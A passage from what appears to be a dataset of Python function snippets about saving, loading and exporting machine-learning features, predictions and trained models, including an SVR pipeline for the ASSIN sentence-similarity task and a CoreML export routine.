self.sets:\n self.save_features_to_file_by_set(s)", "def write_model_data(model, filename):\n data = lasagne.layers.get_all_param_values(model)\n filename = os.path.join('./', filename)\n filename = '%s.%s' % (filename, 'params')\n with open(filename, 'w+') as f:\n pickle.dump(data, f)", "def save_data(features, labels, mask, file_name):\n label = labels[mask]\n label = label.reshape((len(label), 1))\n data = np.concatenate((features[mask, :], label), axis = 1)\n np.save(file_name, data)", "def save_feature(ndarray, feature_name, out_path, x, y, new_labels, filename=None):\n # this is kind-of standard\n filename = filename or FeatureExtractor.get_file_name(x, feature_name)\n np.save(out_path / filename, ndarray)\n new_labels.append([filename, y])\n print('info: {} transformed and saved!'.format(filename))\n return filename", "def run_model(model_name, clf, X_train, y_train, X_test, y_test, feat, output_dirpath):\n model = clf.fit(X_train, y_train)\n score = model.score(X_test, y_test)\n train_pred = model.predict(X_train)\n model_pred = model.predict(X_test)\n\n # Save predictions\n dirpath = os.path.join(output_dirpath, '{}_{}'.format(model_name, feat), 'predictions')\n if not os.path.exists(dirpath):\n os.makedirs(dirpath)\n np.savetxt(os.path.join(dirpath, f'{model_name.replace(\"/\", \"_\").replace(\" \", \"_\")}_test_preds.txt'), model_pred)\n np.savetxt(os.path.join(dirpath, f'{model_name.replace(\"/\", \"_\").replace(\" \", \"_\")}_train_preds.txt'), train_pred)\n\n # Save classifier (with weights)\n dirpath = os.path.join(output_dirpath, '{}_{}'.format(model_name, feat), 'models')\n if not os.path.exists(dirpath):\n os.makedirs(dirpath)\n with open(os.path.join(dirpath, f'{model_name.replace(\"/\", \"_\").replace(\" \", \"_\")}.pkl'), 'wb') as f:\n pickle.dump(model, f)\n\n return model, score, model_pred", "def load_vectors (file_extension = None):\n \n feat_file_name = 'output/' + file_extension + '.feature'\n label_file_name = 'output/' + file_extension + '.label'\n \n prettyPrint( \"Loading feature vectors and labels from disk ... \", color.CYAN)\n if not os.path.isfile(feat_file_name) or not os.path.isfile(label_file_name):\n prettyPrint(\"Feature vector files {0} could not be found. 
Generating from scratch instead ...\".format(feat_file_name), color.CYAN)\n return None, None\n with open(feat_file_name, 'r') as f:\n feat_vec = pickle.load(f)\n with open(label_file_name, 'r') as f:\n labels = pickle.load(f)\n\n prettyPrint (\"Done loading feature vectors.\", color.CYAN)\n return feat_vec, labels", "def run_feature_extraction(word2vec_model=None, fasttext_model=None, ptlkb64_model=None, glove300_model=None, numberbatch_model=None):\n\n\tparser = argparse.ArgumentParser(description=__doc__)\n\tparser.add_argument('test', help='XML file with test data')\n\tparser.add_argument('output', help='Output tagged XML file')\n\targs = parser.parse_args()\n\n\t\"\"\"\n\tsystem_mode = 0 -> uses the variant questions with the system\n\tsystem_mode = 1 -> uses the PTPT and PTBR train ASSIN collection datasets with the system\n\tsystem_mode = 2 -> uses the PTPT and PTBR train and test ASSIN collection datasets with the system\n\tsystem_mode = 3 -> uses the Whoosh collection with the system\n\tsystem_mode = 4 -> uses ASSIN 1 and ASSIN 2 training collection datasets with the system\n\tsystem_mode = 5 -> uses ASSIN 1 training and testing collection and ASSIN 2 training collection datasets with the system\n\n\trun_pipeline = 0 -> uses the pre-computed files with the components needed to extract some features\n\trun_pipeline = 1 -> uses NLPyPort pipeline which avoids having to pre-compute certain components to extract features\n\t\"\"\"\n\n\tsystem_mode = 5\n\trun_pipeline = 1\n\n\t# Flag to indicate if the extracted features should be written to a file (1) or not (0)\n\tfeatures_to_file_flag = 0\n\n\t# extract labels\n\ttrain_pairs = []\n\ttrain_pairs.extend(read_xml(ROOT_PATH + \"/datasets/assin/assin1/assin-ptpt-train.xml\", need_labels=True))\n\ttrain_pairs.extend(read_xml(ROOT_PATH + \"/datasets/assin/assin1/assin-ptbr-train.xml\", need_labels=True))\n\n\tif system_mode == 2 or system_mode == 5:\n\t\ttrain_pairs.extend(read_xml(ROOT_PATH + \"/datasets/assin/assin1/assin-ptpt-test.xml\", need_labels=True))\n\t\ttrain_pairs.extend(read_xml(ROOT_PATH + \"/datasets/assin/assin1/assin-ptbr-test.xml\", need_labels=True))\n\tif system_mode == 4 or system_mode == 5:\n\t\ttrain_pairs.extend(read_xml(ROOT_PATH + \"/datasets/assin/assin2/assin2-train-only.xml\", need_labels=True))\n\n\ttrain_similarity_target = np.array([pair.similarity for pair in train_pairs])\n\n\t# extract training features\n\ttrain_corpus = read_corpus(train_pairs)\n\n\t# debug_data(train_corpus, \"finetune.train.raw\")\n\t# print(\"Wrote training corpus\")\n\n\t# preprocessing(text, tokenization=0, rm_stopwords=0, numbers_to_text=0, to_tfidf=0)\n\tpreprocessed_train_corpus = preprocessing(train_corpus, 0, 0, 0, 0)\n\ttrain_features, used_train_features = extract_features(run_pipeline, train_corpus, preprocessed_train_corpus, word2vec_mdl=word2vec_model, fasttext_mdl=fasttext_model, ptlkb64_mdl=ptlkb64_model, glove300_mdl=glove300_model, numberbatch_mdl=numberbatch_model)\n\n\t# write train features to a .csv file\n\tif features_to_file_flag == 1:\n\t\twrite_features_to_csv(train_pairs, train_features, \"assin1-train-test-assin2-train-ftrain.csv\")\n\n\t#############################################################\n\ttest_pairs_dev = read_xml('datasets/assin/assin2/assin2-dev.xml', need_labels=False)\n\n\ttest_corpus_dev = read_corpus(test_pairs_dev)\n\t# preprocessing(text, tokenization=0, rm_stopwords=0, numbers_to_text=0, to_tfidf=0)\n\tpreprocessed_test_corpus_dev = preprocessing(test_corpus_dev, 0, 0, 0, 
0)\n\ttest_features_dev, used_test_features_dev = extract_features(run_pipeline, test_corpus_dev, preprocessed_test_corpus_dev, word2vec_mdl=word2vec_model, fasttext_mdl=fasttext_model, ptlkb64_mdl=ptlkb64_model, glove300_mdl=glove300_model, numberbatch_mdl=numberbatch_model)\n\n\ttest_pairs_selection = read_xml('datasets/assin/assin2/assin2-dev.xml', need_labels=True)\n\ttest_similarity_target = np.array([pair.similarity for pair in test_pairs_selection])\n\t#############################################################\n\n\t# extract test features\n\t# test_pairs = read_xml(args.test, need_labels=False)\n\n\t# uncomment next line and comment previous one to compute ASSIN 2 submission results\n\ttest_pairs = read_xml_no_attributes(args.test)\n\n\ttest_corpus = read_corpus(test_pairs)\n\t# preprocessing(text, tokenization=0, rm_stopwords=0, numbers_to_text=0, to_tfidf=0)\n\tpreprocessed_test_corpus = preprocessing(test_corpus, 0, 0, 0, 0)\n\ttest_features, used_test_features = extract_features(run_pipeline, test_corpus, preprocessed_test_corpus, word2vec_mdl=word2vec_model, fasttext_mdl=fasttext_model, ptlkb64_mdl=ptlkb64_model, glove300_mdl=glove300_model, numberbatch_mdl=numberbatch_model)\n\n\t# write test features to a .csv file\n\tif features_to_file_flag == 1:\n\t\twrite_features_to_csv(test_pairs, test_features, \"assin1-train-test-assin2-train-ftest.csv\")\n\n\t# extract test features for feature selection (labels needed in order to perform evaluation)\n\t# test_pairs_selection = read_xml(args.test, need_labels=True)\n\t# test_similarity_target = np.array([pair.similarity for pair in test_pairs_selection])\n\n\t'''\n\tSelect one type of regressor from scikit-learn. Here is a list with some examples: \n\t\t- GaussianProcessRegressor()\n\t\t- DecisionTreeRegressor()\n\t\t- LinearRegression()\n\t\t- BaggingRegressor(n_estimators=100)\n\t\t- AdaBoostRegressor(n_estimators=100)\n\t\t- GradientBoostingRegressor()\n\t\t- RandomForestRegressor(n_estimators=100)\n\t'''\n\n\tregressor = SVR(gamma='scale', C=10.0, kernel='rbf')\n\n\t# ensemble = VotingRegressor(estimators=[('svr', regressor_1), ('gb', regressor_2), ('rf', regressor_3)])\n\n\t# params = {'svr__C': [1.0, 10.0, 100.0], 'svr__kernel': ['linear', 'poly', 'rbf', 'sigmoid'], 'rf__n_estimators': [10, 20, 100, 200]}\n\n\t# params = {'kernel':('linear', 'poly', 'rbf', 'sigmoid')}\n\n\t# regressor = GridSearchCV(regressor_1, params, cv=5)\n\n\tuse_feature_selection = 0\n\n\tif use_feature_selection:\n\t\t# selected_selector, selected_train_features, selected_test_features = feature_selection(train_features, test_features_dev, train_similarity_target, test_similarity_target, regressor, used_train_features)\n\t\t# selected_train_features, selected_test_features = rfe_cross_validation(train_features, train_similarity_target, test_features)\n\t\tselected_train_features, selected_test_features, percentile_selector = aux_best_percentile_selector(train_features, test_features_dev, train_similarity_target, test_similarity_target, regressor, used_train_features)\n\n\t\ttest_features_selected = percentile_selector.transform(test_features)\n\t\t# test_features_selected = selected_selector.transform(test_features)\n\n\t\tregressor.fit(selected_train_features, train_similarity_target)\n\n\t\t# save model to disk\n\t\tmodel_save_path = os.path.join('trained_models', 'SVR_FS.joblib')\n\t\tdump(regressor, model_save_path)\n\n\t\t# apply model to the test dataset\n\t\t## this needs to be fixed in order to take advantage of the manual feature 
selection\n\t\tpredicted_similarity = regressor.predict(test_features_selected)\n\t\t# predicted_similarity = regressor.predict(test_features_selected)\n\telse:\n\t\tregressor.fit(train_features, train_similarity_target)\n\n\t\t# save model to disk\n\t\tmodel_save_path = os.path.join('trained_models', 'SVR_NFS.joblib')\n\t\tdump(regressor, model_save_path)\n\n\t\t# apply model to the test dataset\n\t\tpredicted_similarity = regressor.predict(test_features)\n\n\t# write output\n\ttree = ET.parse(args.test)\n\troot = tree.getroot()\n\tfor i in range(len(test_pairs)):\n\t\tpairs = root[i]\n\t\tpairs.set('entailment', \"None\")\n\t\tpairs.set('similarity', str(predicted_similarity[i]))\n\n\ttree.write(args.output, 'utf-8')", "def extract_features_for_file(input_file, output_file, posfile):\n if not unlabeled:\n sents = read_file(input_file)\n else:\n sents = read_file_unlabeled(input_file)\n postags = get_pos_tags(posfile)\n with open(output_file,'w') as output_fileobj:\n if not unlabeled:\n for tokens,goldtags in sents:\n feats = extract_features_for_sentence(tokens, postags)\n for t in range(len(tokens)):\n feats_tabsep = \"\\t\".join(feats[t])\n print>>output_fileobj, \"%s\\t%s\" % (goldtags[t], feats_tabsep)\n print>>output_fileobj, \"\"\n else:\n for tokens in sents:\n feats = extract_features_for_sentence(tokens, postags)\n for t in range(len(tokens)):\n feats_tabsep = \"\\t\".join(feats[t])\n print>>output_fileobj, \"%s\" % (feats_tabsep) #for nolabels dat\n print>>output_fileobj, \"\"", "def feature_extraction(images, save_to='dataset.csv'):\n num_images = len(images)\n logging.info(f\"Extracting features from {num_images} images...\")\n x = np.zeros((num_images, 7))\n y = np.zeros(num_images, dtype=np.int8)\n\n for i, image in enumerate(images):\n logging.info(f\"Processing Image {i+1}/{num_images}...\")\n y[i] = 0 if image.name.startswith('cyl') \\\n else 1 if image.name.startswith('inter') \\\n else 2 if image.name.startswith('let') \\\n else 3 if image.name.startswith('mod') \\\n else 4 if image.name.startswith('para') \\\n else 5 if image.name.startswith('super') \\\n else 6 if image.name.startswith('svar') else -1\n \n # Get number of object pixels in segmented color channels, which become features 0-3\n for color in [0,1,2,4]: # 3 is the color index for RGB so we skip that and use 4 (grayscale)\n uniques, counts = np.unique(image.getMatrix(color), return_counts=True)\n if len(uniques) > 2:\n image = image.otsu(color)\n uniques, counts = np.unique(image.getMatrix(color), return_counts=True)\n x[i,color if color is not 4 else 3] = counts[0]\n\n x[i,4] = np.std(image.getHistogram(4))\n\n x[i,5] = np.argmax(image.getHistogram(4))\n\n x[i,6] = np.argmin(image.getHistogram(4))\n\n # Save new dataset to file\n np.savetxt(save_to, np.concatenate([x,np.atleast_2d(y).T], axis=1), delimiter=',', fmt='%s')\n\n return x, y", "def feature_finder(model):\n \n features = model.steps[0][1].get_feature_names()\n feat_values = model[1].coef_\n\n c = {'features' : features}\n feats = pd.DataFrame(data = c)\n feats['values'] = feat_values[0]\n\n sorted_feats = feats.sort_values(by='values')\n return sorted_feats", "def write_pred_kaggle_file(cls, outfname, speech):\n yp = cls.predict(speech.test_doc_vec)\n labels = speech.le.inverse_transform(yp)\n f = codecs.open(outfname, 'w')\n f.write(\"FileIndex,Category\\n\")\n for i in range(len(speech.test_fnames)):\n fname = speech.test_fnames[i]\n f.write(fname + ',' + labels[i] + '\\n')\n f.close()", "def extract(model, filepath, vid):\n # data loader for 
frames in ingle video\n data_loader = get_dataloader(dataset=\"VideoFrame\",\n path=filepath,\n num_frames=cfg.num_frames,\n batch_size=cfg.batch_size)\n # extract features by inception_v3\n feats = None\n for step, frames in enumerate(data_loader):\n print(\"--> extract features [{}/{}]\".format(step + 1,\n len(data_loader)))\n feat = model(make_variable(frames))\n feats = concat_feat_var(feats, feat.data.cpu())\n\n print(\"--> save feats to {}\"\n .format(cfg.inception_v3_feats_path.format(vid)))\n torch.save(feats, cfg.inception_v3_feats_path.format(vid))\n print(\"--> delete original video file: {}\".format(filepath))\n os.remove(filepath)", "def store_sorted_features(self) -> None:\n\n makedirs(dirname(self.model_weights_path_template_), exist_ok=True)\n\n # Generate feature weights files and a README.json providing\n # the parameters corresponding to each set of feature weights\n params_dict = {}\n for learner_name in self.cv_learners_:\n\n # Skip MiniBatchKMeans models\n if learner_name == 'MiniBatchKMeans':\n logdebug('Skipping MiniBatchKMeans learner instances since '\n 'coefficients can not be extracted from them.')\n continue\n\n for i, estimator in enumerate(self.cv_learners_[learner_name]):\n\n # Get dataframe of the features/coefficients\n try:\n ex.print_model_weights(estimator,\n learner_name,\n self.data_.classes,\n self.cfg_.games,\n self.vec_,\n self.model_weights_path_template_\n .format(learner_name, i + 1))\n params_dict.setdefault(learner_name, {})\n params_dict[learner_name][i] = estimator.get_params()\n except ValueError:\n logerr('Could not generate features/feature coefficients '\n 'dataframe for {0}...'.format(learner_name))\n\n # Save parameters file also\n if params_dict:\n dump(params_dict,\n open(join(dirname(self.model_weights_path_template_),\n 'model_params_readme.json'), 'w'),\n indent=4)", "def walk_forward_prediction(self):\r\n for output_name in self.output_names:\r\n print('\\t\\t\\t|--Prediction type: {}'.format(output_name))\r\n predictions_by_model = {}\r\n pred_metadata_by_model = {}\r\n \r\n print('\\t\\t\\t\\t|--SVM Model')\r\n svm = SupportVectorMachine()\r\n svm.pred_indices = self.pred_indices\r\n svm.full_df = self.full_df\r\n svm.feature_names = self.feature_names\r\n svm.output_name = output_name\r\n svm.svm_optimal_params = self.optimal_params_by_output[output_name]['SVM']\r\n svm.run_svm_prediction()\r\n predictions_by_model['SVM'] = svm.svm_predictions\r\n pred_metadata_by_model['SVM'] = svm.metadata\r\n \r\n self.predictions_by_output[output_name] = predictions_by_model\r\n self.pred_metadata_by_output[output_name] = pred_metadata_by_model", "def saveModel(self):\n for feature in self.features:\n featureName = feature[\"name\"]\n modelProbs = self.model[featureName][\"probabilities\"]\n modelFreqs = self.model[featureName][\"frequencies\"]\n repository.saveProbabilites(modelProbs, self.modelName, featureName, self.modelClass)\n repository.saveFrequences(modelFreqs, self.modelName, featureName, self.modelClass)", "def build_features_and_save_dataset(read_directory, data_save_directory, data_model_save_directory):\n dataset.build_dataset_and_datamodel(\n read_directory=read_directory,\n data_save_directory=data_save_directory,\n data_model_save_directory=data_model_save_directory,\n vectorizer_params=dataset.DEFAULT_VECTORIZER_SETTINGS\n )\n print('Successfully built and saved dataset and data model.')", "def WriteCcmModelToFile(filename, model):\n #Write the .hpp file\n WriteHeaderFileForCcmModel(filename, model)\n\n #Write the .cpp 
fil\n WriteSourceFileForCcmModel(filename, model)", "def saveModel(model, outfile, train_opts, model_opts, view_names=None, sample_names=None, feature_names=None):\n\n # QC checks\n assert model.trained == True, \"Model is not trained yet\"\n assert len(np.unique(view_names)) == len(view_names), 'View names must be unique'\n assert len(np.unique(sample_names)) == len(sample_names), 'Sample names must be unique'\n\n # Create output directory\n if not os.path.isdir(os.path.dirname(outfile)):\n print(\"Output directory does not exist, creating it...\")\n os.makedirs(os.path.dirname(outfile))\n\n # For some reason h5py orders the datasets alphabetically, so we have to sort the likelihoods accordingly\n idx = sorted(range(len(view_names)), key=lambda k: view_names[k])\n tmp = [model_opts[\"likelihood\"][idx[m]] for m in range(len(model_opts[\"likelihood\"]))]\n model_opts[\"likelihood\"] = tmp\n\n # Open HDF5 handler\n hdf5 = h5py.File(outfile,'w')\n\n # Save expectations\n saveExpectations(model,hdf5,view_names)\n\n # Save parameters\n # saveParameters(model,hdf5,view_names)\n\n # Save training statistics\n saveTrainingStats(model,hdf5)\n\n # Save training options\n saveTrainingOpts(train_opts,hdf5)\n\n # Save model options\n saveModelOpts(model_opts,hdf5)\n\n # Save training data\n saveTrainingData(model, hdf5, view_names, sample_names, feature_names, model_opts[\"likelihood\"])\n\n # Close HDF5 file\n hdf5.close()", "def saveTrainingData(model, hdf5, view_names=None, sample_names=None, feature_names=None, likelihoods=None):\n data = model.getTrainingData()\n data_grp = hdf5.create_group(\"data\")\n featuredata_grp = hdf5.create_group(\"features\")\n hdf5.create_dataset(\"samples\", data=np.array(sample_names, dtype='S50'))\n\n if likelihoods is not None:\n data_grp.attrs['likelihood'] = np.array(likelihoods, dtype='S50')\n\n for m in range(len(data)):\n view = view_names[m] if view_names is not None else str(m)\n data_grp.create_dataset(view, data=data[m].data.T)\n if feature_names is not None:\n # data_grp.attrs['features'] = np.array(feature_names[m], dtype='S')\n featuredata_grp.create_dataset(view, data=np.array(feature_names[m], dtype='S50'))", "def write_out_prediction_objects(model, lookups):\n neighbours = get_neighbours(lookups, model)\n id_to_movie = get_reverse_movie_lookup(lookups)\n popular_films = get_popular(lookups)\n\n output = {\n \"neighbours\": neighbours,\n \"id_to_movie\": id_to_movie,\n \"popular_films\": popular_films,\n }\n\n with open(PICKLE_FILENAME, \"wb\") as f:\n pickle.dump(output, f)\n\n return output", "def predict(model_path: str, vec_path: str, data_dir_path: str, numeric: bool):\n logistic = pickle.load(open(model_path, 'rb'))\n vec = pickle.load(open(vec_path, 'rb'))\n # Negative/Normal pcaps.\n # They have no relationship with \"context\" defined in AppInspector, just a bunch of normal flows.\n test_flows = []\n for root, dirs, files in os.walk(data_dir_path):\n for file in files:\n if file.endswith('_http_flows.json'):\n with open(os.path.join(root, file), 'r', encoding=\"utf8\", errors='ignore') as infile:\n flows = json.load(infile)\n for flow in flows:\n # The context label is as same as the ground truth since they are not labelled by AppInspector.\n flow['real_label'] = '0'\n test_flows.append(flow)\n logger.info('The number of test flows %d', len(test_flows))\n # Covert the flows to a feature matrix.\n text_fea, numeric_fea, y, true_labels = Analyzer.gen_instances([], test_flows)\n X, feature_names, vec = Learner.LabelledDocs.vectorize(text_fea, 
vec=vec, tf=False)\n if numeric:\n X = X.toarray()\n X = np.hstack([X, numeric_fea])\n # Prediction.\n res = logistic.predict(X)\n # Analysis.\n analyze(logistic, res, X, test_flows, feature_names)", "def get_feature_labels_files(dataset):\n features = []\n audio_labels = []\n focal_labels = []\n files = []\n for frame in dataset:\n files.append(frame[0])\n features.append(frame[1][0].T)\n if frame[1][1] is not None:\n audio_labels.append(frame[1][1][0].T)\n focal_labels.append(frame[1][1][1].T)\n else:\n audio_labels.append(None)\n focal_labels.append(None)\n features = np.expand_dims(np.asarray(features), 4)\n audio_labels = np.asarray(audio_labels)\n focal_labels = np.asarray(focal_labels)\n return [features, audio_labels,focal_labels, files]", "def get_feature_vector(cc, img, quiet=False):\n savefilename = config.get_classifier_featvect_name(cc.d.images[img]) \n if os.path.isfile(savefilename):\n print 'load feat_vect %s'%(cc.d.images[img].name)\n feat_vect = cPickle.load(open(savefilename,'r'))\n else:\n feat_vect = compute_feature_vector(cc, img, quiet=quiet)\n cPickle.dump(feat_vect, open(savefilename,'w'))\n return feat_vect", "def save_model(model, model_filepath):\n # save the classifier\n with open(model_filepath, 'wb') as fid:\n pkl.dump(model, fid)", "def save_model(self):\n print(\"\\nModels are integrated to be multi scale.\\nSaving to disk.\")\n self.column_names = [ \"x_\" + str(x) for x in range(self.embedding.shape[1])]\n self.embedding = pd.DataFrame(self.embedding, columns = self.column_names)\n self.embedding.to_csv(self.args.output, index = None)", "def export(self, output_dir, config, train_ratio=0.7, delimiter=\",\"):\n model_dir = os.path.join(output_dir, self.model_id)\n if not os.path.exists(model_dir):\n os.makedirs(model_dir)\n X_tr, X_te = self.get_train_test_embeddings(config, train_ratio)\n #save text feature matrix\n idx = config[\"dimension\"]\n tr_text = csr_matrix(X_tr[:,:idx])\n te_text = csr_matrix(X_te[:,:idx])\n print(\"text\", tr_text.shape, te_text.shape)\n save_npz(os.path.join(model_dir, \"train_text\"), tr_text)\n save_npz(os.path.join(model_dir, \"test_text\"), te_text)\n #save history feature matrix\n if config.get(\"user_history\", False):\n tr_history = X_tr[:,idx:idx+4]\n te_history = X_te[:,idx:idx+4]\n np.savetxt(os.path.join(model_dir, \"train_history.csv\"), tr_history, delimiter=delimiter)\n np.savetxt(os.path.join(model_dir, \"test_history.csv\"), te_history, delimiter=delimiter)\n idx += 4\n print(\"history\", tr_history.shape, te_history.shape)\n # save node embeddings\n if \"user_ne\" in config and X_tr.shape[1] > idx:\n tr_network = X_tr[:,idx:]\n te_network = X_te[:,idx:]\n np.savetxt(os.path.join(model_dir, \"train_network.csv\"), tr_network, delimiter=delimiter)\n np.savetxt(os.path.join(model_dir, \"test_network.csv\"), te_network, delimiter=delimiter)\n print(\"network\", tr_network.shape, te_network.shape)\n #save labels\n np.savetxt(os.path.join(model_dir, \"train_label.csv\"), self.tr_label, delimiter=delimiter, fmt='%i')\n np.savetxt(os.path.join(model_dir, \"test_label.csv\"), self.te_label, delimiter=delimiter, fmt='%i')\n #save meta\n self.tr_meta[self._exported_meta_columns].to_csv(os.path.join(model_dir, \"train_meta.csv\"), index=False, sep=delimiter)\n self.te_meta[self._exported_meta_columns].to_csv(os.path.join(model_dir, \"test_meta.csv\"), index=False, sep=delimiter)\n print(\"Model was exported\")\n return model_dir", "def _collect_features(self, save=None):\n makedir(self.modeldir)\n if save is None:\n save 
= '{:s}/all.fts'.format(self.modeldir)\n \n feats = []\n fls = glob('{:s}/*.fts'.format(self.modeldir))\n for i,fl in enumerate(fls):\n if fl.split(os.sep)[-1].split('.')[0] in ['all','ranked']: continue\n with open(fl) as fp:\n lns = fp.readlines()\n feats += [' '.join(ln.rstrip().split()[1:]) for ln in lns] \n\n labels = list(set(feats))\n freqs = [feats.count(label) for label in labels]\n labels = [label for _,label in sorted(zip(freqs,labels))][::-1]\n freqs = sorted(freqs)[::-1]\n # write out feature frequencies\n with open(save, 'w') as fp:\n _ = [fp.write('{:d},{:s}\\n'.format(freq,ft)) for freq,ft in zip(freqs,labels)]\n return labels, freqs", "def export_coreml(self, filename):\n import coremltools\n # First define three internal helper functions\n\n\n # Internal helper function\n def _create_vision_feature_print_screen():\n prob_name = self.target + 'Probability'\n\n #\n # Setup the top level (pipeline classifier) spec\n #\n top_spec = coremltools.proto.Model_pb2.Model()\n top_spec.specificationVersion = 3\n\n desc = top_spec.description\n desc.output.add().name = prob_name\n desc.output.add().name = self.target\n\n desc.predictedFeatureName = self.target\n desc.predictedProbabilitiesName = prob_name\n\n input = desc.input.add()\n input.name = self.feature\n input.type.imageType.width = 299\n input.type.imageType.height = 299\n BGR_VALUE = coremltools.proto.FeatureTypes_pb2.ImageFeatureType.ColorSpace.Value('BGR')\n input.type.imageType.colorSpace = BGR_VALUE\n\n #\n # VisionFeaturePrint extractor\n #\n pipelineClassifier = top_spec.pipelineClassifier\n scene_print = pipelineClassifier.pipeline.models.add()\n scene_print.specificationVersion = 3\n scene_print.visionFeaturePrint.scene.version = 1\n\n input = scene_print.description.input.add()\n input.name = self.feature\n input.type.imageType.width = 299\n input.type.imageType.height = 299\n input.type.imageType.colorSpace = BGR_VALUE\n\n output = scene_print.description.output.add()\n output.name = \"output_name\"\n DOUBLE_ARRAY_VALUE = coremltools.proto.FeatureTypes_pb2.ArrayFeatureType.ArrayDataType.Value('DOUBLE')\n output.type.multiArrayType.dataType = DOUBLE_ARRAY_VALUE\n output.type.multiArrayType.shape.append(2048)\n\n #\n # Neural Network Classifier, which is just logistic regression, in order to use GPUs\n #\n temp = top_spec.pipelineClassifier.pipeline.models.add()\n temp.specificationVersion = 3\n\n # Empty inner product layer\n nn_spec = temp.neuralNetworkClassifier\n feature_layer = nn_spec.layers.add()\n feature_layer.name = \"feature_layer\"\n feature_layer.input.append(\"output_name\")\n feature_layer.output.append(\"softmax_input\")\n fc_layer_params = feature_layer.innerProduct\n fc_layer_params.inputChannels = 2048\n\n # Softmax layer\n softmax = nn_spec.layers.add()\n softmax.name = \"softmax\"\n softmax.softmax.MergeFromString(b'')\n softmax.input.append(\"softmax_input\")\n softmax.output.append(prob_name)\n\n input = temp.description.input.add()\n input.name = \"output_name\"\n input.type.multiArrayType.dataType = DOUBLE_ARRAY_VALUE\n input.type.multiArrayType.shape.append(2048)\n\n # Set outputs\n desc = temp.description\n prob_output = desc.output.add()\n prob_output.name = prob_name\n label_output = desc.output.add()\n label_output.name = self.target\n\n if type(self.classifier.classes[0]) == int:\n prob_output.type.dictionaryType.int64KeyType.MergeFromString(b'')\n label_output.type.int64Type.MergeFromString(b'')\n else:\n prob_output.type.dictionaryType.stringKeyType.MergeFromString(b'')\n 
label_output.type.stringType.MergeFromString(b'')\n\n temp.description.predictedFeatureName = self.target\n temp.description.predictedProbabilitiesName = prob_name\n\n return top_spec\n\n\n # Internal helper function\n def _update_last_two_layers(nn_spec):\n # Replace the softmax layer with new coeffients\n num_classes = self.num_classes\n fc_layer = nn_spec.layers[-2]\n fc_layer_params = fc_layer.innerProduct\n fc_layer_params.outputChannels = self.classifier.num_classes\n inputChannels = fc_layer_params.inputChannels\n fc_layer_params.hasBias = True\n\n coefs = self.classifier.coefficients\n weights = fc_layer_params.weights\n bias = fc_layer_params.bias\n del weights.floatValue[:]\n del bias.floatValue[:]\n\n import numpy as np\n W = np.array(coefs[coefs['index'] != None]['value'], ndmin = 2).reshape(\n inputChannels, num_classes - 1, order = 'F')\n b = coefs[coefs['index'] == None]['value']\n Wa = np.hstack((np.zeros((inputChannels, 1)), W))\n weights.floatValue.extend(Wa.flatten(order = 'F'))\n bias.floatValue.extend([0.0] + list(b))\n\n # Internal helper function\n def _set_inputs_outputs_and_metadata(spec, nn_spec):\n # Replace the classifier with the new classes\n class_labels = self.classifier.classes\n\n probOutput = spec.description.output[0]\n classLabel = spec.description.output[1]\n probOutput.type.dictionaryType.MergeFromString(b'')\n if type(class_labels[0]) == int:\n nn_spec.ClearField('int64ClassLabels')\n probOutput.type.dictionaryType.int64KeyType.MergeFromString(b'')\n classLabel.type.int64Type.MergeFromString(b'')\n del nn_spec.int64ClassLabels.vector[:]\n for c in class_labels:\n nn_spec.int64ClassLabels.vector.append(c)\n else:\n nn_spec.ClearField('stringClassLabels')\n probOutput.type.dictionaryType.stringKeyType.MergeFromString(b'')\n classLabel.type.stringType.MergeFromString(b'')\n del nn_spec.stringClassLabels.vector[:]\n for c in class_labels:\n nn_spec.stringClassLabels.vector.append(c)\n\n prob_name = self.target + 'Probability'\n label_name = self.target\n old_output_name = nn_spec.layers[-1].name\n coremltools.models.utils.rename_feature(spec, 'classLabel', label_name)\n coremltools.models.utils.rename_feature(spec, old_output_name, prob_name)\n if nn_spec.layers[-1].name == old_output_name:\n nn_spec.layers[-1].name = prob_name\n if nn_spec.labelProbabilityLayerName == old_output_name:\n nn_spec.labelProbabilityLayerName = prob_name\n coremltools.models.utils.rename_feature(spec, 'data', self.feature)\n if len(nn_spec.preprocessing) > 0:\n nn_spec.preprocessing[0].featureName = self.feature\n\n mlmodel = coremltools.models.MLModel(spec)\n model_type = 'image classifier (%s)' % self.model\n mlmodel.short_description = _coreml_utils._mlmodel_short_description(model_type)\n mlmodel.input_description[self.feature] = u'Input image'\n mlmodel.output_description[prob_name] = 'Prediction probabilities'\n mlmodel.output_description[label_name] = 'Class label of top prediction'\n _coreml_utils._set_model_metadata(mlmodel, self.__class__.__name__, {\n 'model': self.model,\n 'target': self.target,\n 'features': self.feature,\n 'max_iterations': str(self.max_iterations),\n }, version=ImageClassifier._PYTHON_IMAGE_CLASSIFIER_VERSION)\n\n return mlmodel\n\n\n # main part of the export_coreml function\n if self.model in _pre_trained_models.MODELS:\n ptModel = _pre_trained_models.MODELS[self.model]()\n feature_extractor = _image_feature_extractor.MXFeatureExtractor(ptModel)\n\n coreml_model = feature_extractor.get_coreml_model()\n spec = coreml_model.get_spec()\n nn_spec 
= spec.neuralNetworkClassifier\n else: # model == VisionFeaturePrint_Screen\n spec = _create_vision_feature_print_screen()\n nn_spec = spec.pipelineClassifier.pipeline.models[1].neuralNetworkClassifier\n\n _update_last_two_layers(nn_spec)\n mlmodel = _set_inputs_outputs_and_metadata(spec, nn_spec)\n mlmodel.save(filename)", "def save_model(self):\n\n print('Save model')\n self.feature_extractor.save_weights(\n self.path_save_model + self.name_model + '.h5')\n\n print('Mean and std')\n np.save(self.path_save_model + 'mean.npy', self.mean)\n np.save(self.path_save_model + 'std.npy', self.std)", "def decode(dataset, model, idx2token, save_file, align=False, log=False):\n with open(save_file, 'w') as fw:\n for sample in tqdm(dataset):\n uttid = sample['uttid']\n x = np.array([sample['feature']], dtype=np.float32)\n logits = model(x)\n _align = get_predicts(logits)[0].numpy()\n list_tokens = []\n token_prev = None\n for token in _align:\n if token_prev == token:\n continue\n list_tokens.append(token)\n token_prev = token\n if align:\n line = ' '.join(str(token) for token in _align)\n else:\n line = ' '.join(idx2token[token] for token in list_tokens)\n if log:\n print('predicted align: ', _align)\n print('predicted trans: ', line)\n fw.write(uttid + ' ' + line + '\\n')", "def write_features(self):\r\n def pack_keypoint(keypoints, descriptors):\r\n kpts = np.array([[kp.pt[0], kp.pt[1], kp.size,\r\n kp.angle, kp.response, kp.octave,\r\n kp.class_id]\r\n for kp in keypoints])\r\n desc = np.array(descriptors)\r\n return kpts, desc\r\n\r\n filename = self.features_path + self.id\r\n kpts, desc = pack_keypoint(self.keypoints, self.descriptors)\r\n logging.info(f'Writing features of image {self.name} to file...')\r\n np.savez(filename, keypoints=kpts, descriptors=desc)\r\n logging.info('Features saved.')", "def 